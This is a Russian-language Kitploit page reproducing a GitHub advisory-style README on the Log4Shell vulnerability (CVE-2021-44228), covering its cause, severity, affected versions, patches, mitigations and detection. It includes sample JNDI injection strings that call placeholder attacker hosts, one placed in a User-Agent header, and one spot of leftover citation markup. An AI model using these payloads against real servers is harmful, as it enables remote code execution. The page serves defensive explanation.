Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-44228 — CVE-2021-44228 | Kitploit
Инструменты/GitHubGitHub/0xblackash/cve-2021-44228
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийРазведка угрозОбучение и ОбразованиеПодобранные Ресурсы
GitHub0xblackash/cve-2021-44228

CVE-2021-44228

CVE-2021-44228

Репозиторий
22 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 CVE-2021-44228 — “Log4Shell”

ChatGPT Image Jun 14, 2026, 02_56_45 PM

Severity CVSS Type Date

Критическая уязвимость удаленного выполнения кода в Apache Log4j 2, широко известная как Log4Shell.


📖 Содержание

  • Обзор
  • Технические детали
  • Серьезность и CVSS
  • Уязвимые версии
  • Эксплуатация и воздействие
  • Реальное влияние
  • Обнаружение
  • Смягчение и исправления
  • Резюме

🔎 Обзор

CVE-2021-44228 — это критическая уязвимость RCE в :contentReference[oaicite:0]{index=0} версии 2.x (до 2.15.0), обнаруженная в декабре 2021 года.

Она позволяет неаутентифицированным удаленным злоумышленникам выполнять произвольный код на уязвимых системах, просто отправляя специально подготовленные данные, которые регистрируются Log4j. Ошибка затрагивает бесчисленное количество Java-приложений и сервисов по всему миру.


🧠 Технические детали

Скачать инструмент

Уязвимость возникает из-за обработки Log4j JNDI-поисков в регистрируемых строках. Злоумышленник может внедрить вредоносный JNDI-ресурс в регистрируемое сообщение (например, LDAP, DNS), например:

root@kitploit:~

${jndi:ldap://attacker.com/a}

Log4j выполнит:

  1. Разбор JNDI-поиска из входных данных
  2. Удаленный поиск на сервере злоумышленника
  3. Загрузку вредоносного Java-кода в процессе поиска
  4. Выполнение этого кода в контексте уязвимого приложения

Это позволяет злоумышленнику добиться полного удаленного выполнения кода (RCE) на затронутых сервисах.


📊 Серьезность и CVSS

МетрикаЗначение
CVSS v3.1 Базовая оценка10.0 (Критический)
Вектор атакиСеть
Требуемые привилегииНет
Взаимодействие с пользователемНет
АутентификацияНе требуется
ВоздействиеПолный RCE

Поскольку Log4j используется в бесчисленных библиотеках и приложениях, любая система, регистрирующая ненадежные данные, может быть уязвима.


📦 Уязвимые версии

Следующие версии Log4j 2 являются уязвимыми:

root@kitploit:~

>= 2.0-beta9 and < 2.15.0

Кроме того, некоторые конфигурации 2.15.0 все еще были эксплуатируемы, поэтому 2.16.0 и выше являются безопасным базовым уровнем.


🛠 Исправления и смягчение

✅ Официальные исправленные версии

Обновитесь до версий Log4j 2:

root@kitploit:~

2.17.1 или новее

Более поздние патчи дополнительно повышают безопасность (например, 2.17.2, 2.19.0 и т.д.).


🧱 Временные меры (если нет возможности сразу установить патч)

Если немедленное обновление невозможно, вы можете:

  • Отключить JNDI-поиски в конфигурации Log4j
  • Установить:
root@kitploit:~

log4j2.formatMsgNoLookups=true

  • Удалить класс JndiLookup из classpath:
root@kitploit:~

zip -q -d log4j-core.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

Эти шаги помогут снизить подверженность риску до тех пор, пока вы не сможете выполнить обновление.


🔥 Эксплуатация и воздействие

nessus3
nessus4
nessus5

Эту уязвимость чрезвычайно легко эксплуатировать. Злоумышленнику достаточно отправить специально сформированную строку (например, через HTTP-заголовки, параметры формы, сообщения чата, поля базы данных), которая будет зарегистрирована приложением:

root@kitploit:~

User-Agent: ${jndi:ldap://attacker.example/a}

После регистрации приложение выполнит удаленный поиск и может быть вынуждено выполнить Java-код, контролируемый злоумышленником.


🌍 Реальное влияние

Log4Shell оказала огромное глобальное влияние:

  • Бесчисленные публичные сервисы оказались немедленно уязвимы
  • Пострадали облачные провайдеры, игровые серверы, корпоративные приложения, IoT, веб-сервисы, API и многое другое
  • Целые сообщества безопасности мобилизовались для обнаружения и исправления уязвимых систем
  • Эксплуатация была массовой, автоматизированной и быстрой

Это одна из самых значительных уязвимостей за последние десятилетия.


🧪 Обнаружение

Вы можете обнаружить уязвимые системы:

  • Проверяя журналы на наличие подозрительных JNDI-шаблонов (${jndi:)
  • Используя сканеры уязвимостей, проверяющие версии Log4j
  • Мониторя входящий трафик на предмет попыток эксплуатации
  • Проверяя содержимое classpath на поддержку JNDI-поиска

📌 Резюме

ПолеЗначение
Идентификатор CVECVE-2021-44228
ПсевдонимLog4Shell
ПродуктApache Log4j 2
СерьезностьКритический (CVSS 10.0)
ТипУдаленное выполнение кода
ВоздействиеПолная компрометация системы
ЭксплуатируемостьЧрезвычайно легко
СмягчениеОбновление до ≥ 2.17.1

⚠️ Заключительная рекомендация

Если ваше приложение или любая используемая вами библиотека полагаются на Log4j 2.x, немедленно обновитесь до исправленной версии (≥ 2.17.1) и убедитесь, что JNDI-поиски отключены или удалены, где это возможно.